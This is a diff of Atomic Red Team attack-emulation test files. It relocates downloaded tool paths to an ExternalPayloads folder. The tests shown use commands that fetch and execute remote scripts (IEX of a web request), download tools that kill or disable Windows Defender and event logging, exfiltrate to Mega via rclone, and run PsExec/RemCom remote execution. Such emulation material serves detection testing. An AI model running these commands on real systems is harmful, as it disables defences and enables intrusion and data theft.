b/atomics/T1560.001/T1560.001.yaml @@ -107,9 +107,10 @@ atomic_tests: cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' get_prereq_command: | IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) - if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + if(Invoke-WebRequestVerifyHash "#{winzip_url}" "PathToAtomicsFolder\..\ExternalPayloads\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue - cmd /c "$env:Temp\winzip.exe" + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\winzip.exe" } executor: name: command_prompt diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 31da018a..6e845d8b 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml @@ -186,18 +186,19 @@ atomic_tests: - description: | Sysmon must be downloaded prereq_command: | - if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } + if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" - Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force - Remove-Item $env:TEMP\Sysmon.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip PathToAtomicsFolder\..\ExternalPayloads\Sysmon -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip -Force - description: | sysmon must be Installed prereq_command: | if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else - { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} + { Set-Location PathToAtomicsFolder\..\ExternalPayloads\Sysmon\; .\Sysmon.exe -accepteula -i} - description: | sysmon filter must be loaded prereq_command: | @@ -564,7 +565,7 @@ atomic_tests: DefenderControlExe: description: Path to Defender Control software version 1.6. type: string - default: $env:temp\DefenderControl\DefenderControl\DefenderControl.exe + default: PathToAtomicsFolder\..\ExternalPayloads\DefenderControl\DefenderControl\DefenderControl.exe dependency_executor_name: powershell dependencies: - description: | @@ -572,8 +573,9 @@ atomic_tests: prereq_command: | if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1} get_prereq_command: | - Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic - expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip" + expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\DefenderControl" executor: command: | cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null @@ -594,7 +596,7 @@ atomic_tests: AdvancedRun_Location: description: Path of Advanced Run executable type: path - default: '$env:temp\AdvancedRun.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe' delete_defender_folder: description: Set to 1 to also delete the Windows Defender folder type: integer @@ -606,8 +608,9 @@ atomic_tests: prereq_command: | if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip" - Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force executor: command: | Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{} @@ -633,11 +636,13 @@ atomic_tests: default: MsMpEng.exe dependency_executor_name: powershell dependencies: - - description: Backstab64.exe should exist in %temp% - prereq_command: if (Test-Path $env:temp\Backstab64.exe) {exit 0} else {exit 1} - get_prereq_command: Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -Destination "$env:temp\Backstab64.exe" -dynamic + - description: Backstab64.exe should exist in ExtrnalPayloads Directory + prereq_command: if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" executor: - command: '& $env:temp\Backstab64.exe -k -n #{process_name}' + command: '& PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe -k -n #{process_name}' name: powershell elevation_required: true - name: WinPwn - Kill the event log services for stealth diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml index 181016f1..37caa310 100644 --- a/atomics/T1562.006/T1562.006.yaml +++ b/atomics/T1562.006/T1562.006.yaml @@ -88,7 +88,7 @@ atomic_tests: ps_exec_location: description: Location of PSExec. type: string - default: $env:temp\pstools\PsExec.exe + default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe session: description: The session to disable. type: string @@ -102,8 +102,9 @@ atomic_tests: - description: PSExec must be installed on the machine. prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1} get_prereq_command: |- - start-bitstransfer -source "https://download.sysinternals.com/files/PSTools.zip" -destination "$env:temp\PStools.zip" - expand-archive -literalpath "$env:temp\PStools.zip" -destinationpath "$env:temp\pstools" -force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" + expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force executor: command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets diff --git a/atomics/T1564.006/T1564.006.yaml b/atomics/T1564.006/T1564.006.yaml index 137b07f8..4073c891 100644 --- a/atomics/T1564.006/T1564.006.yaml +++ b/atomics/T1564.006/T1564.006.yaml @@ -90,17 +90,18 @@ atomic_tests: prereq_command: | if (Test-Path "#{virtualbox_exe}") {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $wc = New-Object System.Net.WebClient - $wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}") - start-process -FilePath "$env:TEMP\#{virtualbox_installer}" -ArgumentList "--silent" -Wait + $wc.DownloadFile("#{virtualbox_download}","PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}") + start-process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}" -ArgumentList "--silent" -Wait - description: | VBoxManage must exist on disk at specified locations (#{vboxmanage_exe}) prereq_command: | if (Test-Path "#{vboxmanage_exe}") {exit 0} else {exit 1} get_prereq_command: | $wc = New-Object System.Net.WebClient - $wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}") - start-process -FilePath "$env:TEMP\#{virtualbox_installer}" -ArgumentList "--silent" -Wait + $wc.DownloadFile("#{virtualbox_download}","PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}") + start-process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}" -ArgumentList "--silent" -Wait executor: name: command_prompt elevation_required: false diff --git a/atomics/T1567.002/T1567.002.yaml b/atomics/T1567.002/T1567.002.yaml index fc34da89..5427a371 100644 --- a/atomics/T1567.002/T1567.002.yaml +++ b/atomics/T1567.002/T1567.002.yaml @@ -12,7 +12,7 @@ atomic_tests: rclone_path: description: Directory of rclone.exe type: path - default: $env:temp\T1567.002\rclone-v*\ + default: PathToAtomicsFolder\..\ExternalPayloads\T1567.002\rclone-v*\ rclone_config_path: description: Path to rclone's config file (default should be fine) type: path @@ -20,7 +20,7 @@ atomic_tests: dir_to_copy: description: Directory to copy type: string - default: $env:temp\T1567.002 + default: PathToAtomicsFolder\..\ExternalPayloads\T1567.002 mega_user_account: description: Mega user account type: string @@ -40,8 +40,9 @@ atomic_tests: prereq_command: | if (Test-Path #{rclone_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile $env:temp\rclone.zip - Expand-archive -path $env:temp\rclone.zip -destinationpath $env:temp\T1567.002\ -force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile PathToAtomicsFolder\..\ExternalPayloads\rclone.zip + Expand-archive -path PathToAtomicsFolder\..\ExternalPayloads\rclone.zip -destinationpath PathToAtomicsFolder\..\ExternalPayloads\T1567.002\ -force executor: command: | New-Item #{rclone_config_path}\rclone -ItemType directory @@ -56,7 +57,7 @@ atomic_tests: .\rclone.exe config delete #{remote_share}: Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue cd c:\ - Remove-Item $env:temp\rclone.zip - Remove-Item $env:temp\T1567.002 -recurse -force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\rclone.zip + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\T1567.002 -recurse -force name: powershell elevation_required: false diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml index d0d0a5aa..170e79d6 100644 --- a/atomics/T1569.002/T1569.002.yaml +++ b/atomics/T1569.002/T1569.002.yaml @@ -52,24 +52,20 @@ atomic_tests: description: Password type: string default: P@ssw0rd1 - psexec_exe: - description: Path to PsExec - type: string - default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: - description: | - PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) + PsExec tool from Sysinternals must exist in the ExternalPayloads directory prereq_command: | - if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force - New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force executor: command: | - #{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" + PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" name: command_prompt - name: psexec.py (Impacket) auto_generated_guid: edbcd8c9-3639-4844-afad-455c91e95a35 @@ -160,21 +156,18 @@ atomic_tests: description: Password type: string default: P@ssw0rd1 - remcom_exe: - description: Path to RemCom - type: string - default: $pathtoatomicsfolder\T1569.002\bin\remcom.exe dependency_executor_name: powershell dependencies: - description: | - RemCom tool must exist on disk at specified location (#{remcom_exe}) + RemCom tool must exist on disk in the ExternalPayloads folder prereq_command: | - if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe") { exit 0} else { exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "#{remcom_exe}" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe" executor: command: | - "#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe + "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe name: command_prompt - name: Snake Malware Service Create auto_generated_guid: b8db787e-dbea-493c-96cb-9272296ddc49